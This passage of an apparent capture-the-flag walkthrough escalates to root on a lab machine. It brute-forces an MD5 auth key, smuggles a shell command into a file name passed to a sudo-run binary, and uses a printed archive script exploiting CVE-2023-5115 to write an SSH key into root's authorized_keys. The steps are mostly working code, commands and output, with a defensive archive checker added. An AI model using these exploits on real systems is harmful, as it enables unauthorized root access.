    if (!check_auth(auth_key)) {
        printf("Error: Authentication failed.\n");
        return 1;
    }

    if (strcmp(argv[1], "list") == 0) {
        listPlaybooks();
    } else if (strcmp(argv[1], "run") == 0) {
        int playbookNumber = atoi(argv[2]);
        if (playbookNumber > 0) {
            DIR *dir = opendir(PLAYBOOK_LOCATION);
            if (dir == NULL) {
                perror("Failed to open the playbook directory");
                return 1;
            }

            struct dirent *entry;
            int currentPlaybookNumber = 1;
            char *playbookName = NULL;

            while ((entry = readdir(dir)) != NULL) {
                if (entry->d_type == DT_REG && strstr(entry->d_name, ".yml") != NULL) {
                    if (currentPlaybookNumber == playbookNumber) {
                        playbookName = entry->d_name;
                        break;
                    }
                    currentPlaybookNumber++;
                }
            }

            closedir(dir);
            if (playbookName != NULL) {
                runPlaybook(playbookName);
            } else {
                printf("Invalid playbook number.\n");
            }
        } else {
            printf("Invalid playbook number.\n");
        }
    } else if (strcmp(argv[1], "install") == 0) {
        installRole(argv[2]);
    } else {
        printf("Usage2: %s [list|run playbook_number|install role_url] -a <auth_key>\n", argv[0]);
        return 1;
    }

    return 0;
}
```

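The Python script below recovers the key, assuming it starts with UHI75GHI followed by four uppercase letters or digits. It brute-forces those four characters against AUTH_KEY_HASH:

```python
#!/usr/bin/env python3
import hashlib
import itertools
import string

z = "0feda17076d793c2ef2870d7427ad4ed"        # AUTH_KEY_HASH from runner1.c
p = "UHI75GHI"                                # known key prefix
a = string.ascii_uppercase + string.digits    # assumed charset of the missing characters

for ending in itertools.product(a, repeat=4):
    password = f"{p}{''.join(ending)}"
    if hashlib.md5(password.encode()).hexdigest() == z:
        print(f"[+] Found password: {password}")
        break
else:
    # for/else: runs only if the loop finished without a break
    print("[-] Failed to find password")
```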

Running it:

```
time python crackit.py
[+] Found password: UHI75GHINKOP

real    0m0.367s
user    0m0.367s
sys     0m0.000s
```

With this new information, we can go back to the previous step and provide the correct key in the JSON file:

```
lopez@intuition:/tmp$ echo '{"run": {"action": "run", "num": 1}, "auth_code": "UHI75GHINKOP"}' > test.json
lopez@intuition:/tmp$ sudo /opt/runner2/runner2 test.json

PLAY [Update and Upgrade APT Packages test] ************************************

TASK [Gathering Facts] *********************************************************
The authenticity of host '127.0.0.1 (127.0.0.1)' can't be established.
ED25519 key fingerprint is SHA256:++SuiiJ+ZwG7d5q6fb9KqhQRx1gGhVOfGR24bbTuipg.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? no
fatal: [127.0.0.1]: UNREACHABLE! => {"changed": false, "msg": "Failed to connect to the host via ssh: Host key verification failed.", "unreachable": true}

PLAY RECAP *********************************************************************
127.0.0.1                  : ok=0    changed=0    unreachable=1    failed=0    skipped=0    rescued=0    ignored=0
```

Unfortunately, I can only pass a number, which corresponds to playbooks in a directory where I can’t write. The behavior might differ in runner2 compared to runner1, so I’ll need to reverse the binary to investigate further.

Trying the install action instead, the error messages reveal that runner2 expects a role_file key pointing to a tar archive:

```
lopez@intuition:/tmp$ echo '{"run": {"action": "install", "role": "/etc/passwd"}, "auth_code": "UHI75GHINKOP"}' > test.json
lopez@intuition:/tmp$ sudo /opt/runner2/runner2 test.json
Role File missing or invalid for 'install' action.
lopez@intuition:/tmp$ echo '{"run": {"action": "install", "role_file": "/etc/passwd"}, "auth_code": "UHI75GHINKOP"}' > test.json
lopez@intuition:/tmp$ sudo /opt/runner2/runner2 test.json
Invalid tar archive.
lopez@intuition:/tmp$ tar -cvf test.tar test.json
test.json
lopez@intuition:/tmp$ echo '{"run": {"action": "install", "role_file": "/tmp/test.tar"}, "auth_code": "UHI75GHINKOP"}' > test.json
lopez@intuition:/tmp$ sudo /opt/runner2/runner2 test.json
Starting galaxy role install process
[WARNING]: - /tmp/test.tar was NOT installed successfully: this role does not appear to have a meta/main.yml file.
ERROR! - you can use --ignore-errors to skip failed roles and finish processing the list.
```

Command Injection in the install command

In runner1, the role URL is interpolated into a string that is passed to system(), so a semicolon in it would inject a second command. Trying the same with role_file in runner2:

```
lopez@intuition:/tmp$ echo '{"run": {"action": "install", "role_file": "/tmp/test.tar;id"}, "auth_code": "UHI75GHINKOP"}' > test.json
lopez@intuition:/tmp$ sudo /opt/runner2/runner2 test.json
Invalid tar archive.
```

This time it reports an invalid archive. runner1 had no such validation; presumably runner2 checks that the full path, including ";id", is a valid tar file on disk. Copying the archive to a file with that exact name gets past the check:

```
lopez@intuition:/tmp$ cp test.tar 'test.tar;id'
lopez@intuition:/tmp$ sudo /opt/runner2/runner2 test.json
Starting galaxy role install process
[WARNING]: - /tmp/test.tar was NOT installed successfully: this role does not appear to have a meta/main.yml file.
ERROR! - you can use --ignore-errors to skip failed roles and finish processing the list.
uid=0(root) gid=0(root) groups=0(root)
```

The id output shows that the injected command ran as root. Turning that into a shell is as easy as replacing “id” with “bash”:

```
lopez@intuition:/tmp$ cp 'test.tar;id' 'test.tar;bash'
lopez@intuition:/tmp$ echo '{"run": {"action": "install", "role_file": "/tmp/test.tar;bash"}, "auth_code": "UHI75GHINKOP"}' > test.json
lopez@intuition:/tmp$ sudo /opt/runner2/runner2 test.json
Starting galaxy role install process
[WARNING]: - /tmp/test.tar was NOT installed successfully: this role does not appear to have a meta/main.yml file.
ERROR! - you can use --ignore-errors to skip failed roles and finish processing the list.
root@intuition:/tmp# id
uid=0(root) gid=0(root) groups=0(root)
```

Then the root flag is easy to get.

Alternative Path to Root

Ansible Galaxy Vulnerability Exploitation CVE-2023-5115

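CVE-2023-5115 is an absolute path traversal vulnerability in ansible-galaxy role installation. A crafted role archive can contain a symlink that points outside the extraction directory, followed by a regular file entry with the same name. When the role is installed, that file's contents are written through the symlink, overwriting an arbitrary file with the privileges of the user running the install.

Key Details:

- Type: Path traversal (arbitrary file overwrite via symlink)
- Impact: An attacker who gets a victim to install a malicious role can overwrite files outside the roles path. Here, runner2 runs ansible-galaxy as root, so any file on the system can be overwritten.
- Affected Versions: ansible-core releases before the fix; check the official advisory for the exact versions affected.

Copy the code below, which can also be found in this link. It is the create-role-archive.py helper from ansible-core's integration tests for this fix: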

```python
#!/usr/bin/env python
"""Create a role archive which overwrites an arbitrary file."""

import argparse
import pathlib
import tarfile
import tempfile


def main() -> None:
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument('archive', type=pathlib.Path, help='archive to create')
    parser.add_argument('content', type=pathlib.Path, help='content to write')
    parser.add_argument('target', type=pathlib.Path, help='file to overwrite')

    args = parser.parse_args()

    create_archive(args.archive, args.content, args.target)


def create_archive(archive_path: pathlib.Path, content_path: pathlib.Path, target_path: pathlib.Path) -> None:
    # Parenthesized context managers require Python 3.10+
    with (
        tarfile.open(name=archive_path, mode='w') as role_archive,
        tempfile.TemporaryDirectory() as temp_dir_name,
    ):
        temp_dir_path = pathlib.Path(temp_dir_name)

        # An (empty) meta/main.yml is required for ansible-galaxy to accept the role
        meta_main_path = temp_dir_path / 'meta' / 'main.yml'
        meta_main_path.parent.mkdir()
        meta_main_path.write_text('')

        # Symlink pointing at the file to overwrite
        symlink_path = temp_dir_path / 'symlink'
        symlink_path.symlink_to(target_path)

        role_archive.add(meta_main_path)
        role_archive.add(symlink_path)

        # Regular entry with the same name as the symlink: extracting it writes through the link
        content_tarinfo = role_archive.gettarinfo(content_path, str(symlink_path))

        with content_path.open('rb') as content_file:
            role_archive.addfile(content_tarinfo, content_file)


if __name__ == '__main__':
    main()
```

The same change adds an integration test, test/integration/targets/ansible-galaxy-role/tasks/dir-traversal.yml, which shows how the script is used and asserts that the patched ansible-galaxy refuses the archive:

```yaml
- name: create test directories
  file:
    path: '{{ remote_tmp_dir }}/dir-traversal/{{ item }}'
    state: directory
  loop:
    - source
    - target
    - roles

- name: create test content
  copy:
    dest: '{{ remote_tmp_dir }}/dir-traversal/source/content.txt'
    content: |
      some content to write

- name: build dangerous dir traversal role
  script:
    chdir: '{{ remote_tmp_dir }}/dir-traversal/source'
    cmd: create-role-archive.py dangerous.tar content.txt {{ remote_tmp_dir }}/dir-traversal/target/target-file-to-overwrite.txt
    executable: '{{ ansible_playbook_python }}'

- name: install dangerous role
  command:
    cmd: ansible-galaxy role install --roles-path '{{ remote_tmp_dir }}/dir-traversal/roles' dangerous.tar
    chdir: '{{ remote_tmp_dir }}/dir-traversal/source'
  ignore_errors: true
  register: galaxy_install_dangerous

- name: check for overwritten file
  stat:
    path: '{{ remote_tmp_dir }}/dir-traversal/target/target-file-to-overwrite.txt'
  register: dangerous_overwrite_stat

- name: get overwritten content
  slurp:
    path: '{{ remote_tmp_dir }}/dir-traversal/target/target-file-to-overwrite.txt'
  register: dangerous_overwrite_content
  when: dangerous_overwrite_stat.stat.exists

- assert:
    that:
      - dangerous_overwrite_content.content|default('')|b64decode == ''
      - not dangerous_overwrite_stat.stat.exists
      - galaxy_install_dangerous is failed
```

Save a copy of the script on the target as create.py. The command below builds a tar archive containing three entries: an empty meta/main.yml (required for the install to succeed), a symlink named symlink that points at the target path, and a second entry with the same name that holds the contents of test.json. On extraction, the symlink is created first and the second entry is then written through it, so the content lands at the target path. I'm choosing a directory I control (/dev/shm/.test) so I can verify that it works and observe the outcome.

```
lopez@intuition:/dev/shm/.test$ python3 create.py test.tar test.json /dev/shm/.test/root.json
lopez@intuition:/dev/shm/.test$ tar -tvf test.tar
-rw-rw-r-- lopez/lopez       0 2024-05-04 20:15 tmp/tmpnhaijasn/meta/main.yml
lrwxrwxrwx lopez/lopez       0 2024-05-04 20:15 tmp/tmpnhaijasn/symlink -> /dev/shm/.test/root.json
-rw-rw-r-- lopez/lopez      87 2024-05-04 20:12 tmp/tmpnhaijasn/symlink
```
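The listing above shows exactly what a defender could look for before installing a role: a link that escapes the extraction directory, followed by a regular entry reusing the link's name. The sketch below flags both patterns with Python's tarfile module. It is a hypothetical pre-install check, not how ansible-core implements its fix.

```python
import posixpath
import tarfile
from typing import List


def suspicious_members(archive: tarfile.TarFile) -> List[str]:
    """Flag link entries that escape the extraction root, and regular entries
    that reuse the name of an earlier link (their data is written through it)."""
    findings: List[str] = []
    link_names = set()
    for member in archive.getmembers():
        if member.issym() or member.islnk():
            target = member.linkname
            if member.issym():
                # Symlink targets resolve relative to the link's own directory
                resolved = posixpath.normpath(
                    posixpath.join(posixpath.dirname(member.name), target))
            else:
                # Hard-link targets are names of other archive members
                resolved = posixpath.normpath(target)
            if posixpath.isabs(target) or resolved == ".." or resolved.startswith("../"):
                findings.append(f"{member.name}: link escapes extraction root -> {target}")
            link_names.add(member.name)
        elif member.name in link_names:
            findings.append(f"{member.name}: entry overwrites an earlier link of the same name")
    return findings
```

Run against test.tar, it should report the symlink to /dev/shm/.test/root.json and the second symlink entry that writes through it.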

Next, point runner2 at the archive:

```
lopez@intuition:/dev/shm/.test$ echo '{"run": {"action": "install", "role_file": "test.tar"}, "auth_code": "UHI75GHINKOP"}' > test.json
lopez@intuition:/dev/shm/.test$ sudo /opt/runner2/runner2 test.json
Starting galaxy role install process
- extracting test.tar to /root/.ansible/roles/test.tar
- test.tar was installed successfully
[WARNING]: Meta file /root/.ansible/roles/test.tar is empty. Skipping dependencies.
lopez@intuition:/dev/shm/.test$ ls -l root.json
-rw-rw-r-- 1 lopez lopez 87 May  4 20:12 root.json
```

However, there's a problem: root.json is owned by lopez, not root. The archive listing shows that its entries are owned by lopez as well, so the ownership recorded in the archive is preserved on extraction.

I'll switch to my own VM, get a root shell, recreate the script there, and run it so the archive entries are owned by root. Since I can't install a role with the same name twice, I'll rename the archive before installing it.
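As an alternative to building the archive from a root shell, Python's tarfile lets you rewrite the ownership fields (`uid`, `gid`, `uname`, `gname`) on each entry before it is written. The sketch below is a hypothetical variant of create_archive above that records every entry as root:root. It assumes, consistent with the ownership behavior observed above, that extraction running as root restores the recorded owner.

```python
import pathlib
import tarfile
import tempfile


def as_root(info: tarfile.TarInfo) -> tarfile.TarInfo:
    """Rewrite ownership metadata on an archive entry to root:root."""
    info.uid = info.gid = 0
    info.uname = info.gname = "root"
    return info


def create_root_owned_archive(archive_path: pathlib.Path, content_path: pathlib.Path,
                              target_path: pathlib.Path) -> None:
    """Same layout as create_archive, but every entry is recorded as root-owned."""
    with tarfile.open(name=archive_path, mode="w") as role_archive:
        with tempfile.TemporaryDirectory() as temp_dir_name:
            temp_dir_path = pathlib.Path(temp_dir_name)

            # Empty meta/main.yml so ansible-galaxy accepts the role
            meta_main_path = temp_dir_path / "meta" / "main.yml"
            meta_main_path.parent.mkdir()
            meta_main_path.write_text("")

            # Symlink pointing at the file to overwrite
            symlink_path = temp_dir_path / "symlink"
            symlink_path.symlink_to(target_path)

            # filter= lets us edit each TarInfo before it is added
            role_archive.add(meta_main_path, filter=as_root)
            role_archive.add(symlink_path, filter=as_root)

            # Regular entry with the symlink's name: its data is written through the link
            content_tarinfo = as_root(role_archive.gettarinfo(content_path, str(symlink_path)))
            with open(content_path, "rb") as content_file:
                role_archive.addfile(content_tarinfo, content_file)
```

The ownership lives only in the tar headers, so nothing here requires root privileges on the machine that builds the archive.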

```
motasem@kali# python create-role-archive.py test.tar ed25519_gen.pub /dev/shm/.test/root
motasem@kali# tar -tvf test.tar
-rw-r--r-- root/root         0 2024-05-04 16:31 tmp/tmpufykaa8z/meta/main.yml
lrwxrwxrwx root/root         0 2024-05-04 16:31 tmp/tmpufykaa8z/symlink -> /dev/shm/.test/root
-rw------- root/root        96 2024-05-04 16:30 tmp/tmpufykaa8z/symlink
```

After copying test.tar to /dev/shm/.test on the target, I rename it and install it:

```
lopez@intuition:/dev/shm/.test$ mv test.tar test2.tar
lopez@intuition:/dev/shm/.test$ echo '{"run": {"action": "install", "role_file": "test2.tar"}, "auth_code": "UHI75GHINKOP"}' > test.json
lopez@intuition:/dev/shm/.test$ sudo /opt/runner2/runner2 test.json
Starting galaxy role install process
- extracting test2.tar to /root/.ansible/roles/test2.tar
- test2.tar was installed successfully
[WARNING]: Meta file /root/.ansible/roles/test2.tar is empty. Skipping dependencies.
lopez@intuition:/dev/shm/.test$ ls -l root
-rw------- 1 root root 96 May  4 20:30 root
```

This time the written file is owned by root.

To exploit this, I'll build the archive again on my VM, this time targeting /root/.ssh/authorized_keys. After uploading it, I'll install the role:

```
motasem@kali# python create-role-archive.py test3.tar ed25519_gen.pub /root/.ssh/authorized_keys
```

```
lopez@intuition:/dev/shm/.test$ echo '{"run": {"action": "install", "role_file": "test3.tar"}, "auth_code": "UHI75GHINKOP"}' > test.json
lopez@intuition:/dev/shm/.test$ sudo /opt/runner2/runner2 test.json
Starting galaxy role install process
- extracting test3.tar to /root/.ansible/roles/test3.tar
- test3.tar was installed successfully
[WARNING]: Meta file /root/.ansible/roles/test3.tar is empty. Skipping dependencies.
```

With my public key in root's authorized_keys, I can SSH in as root:

```
motasem@kali$ ssh -i ~/keys/ed25519_gen root@comprezzor.htb
root@intuition:~#
```

Done.
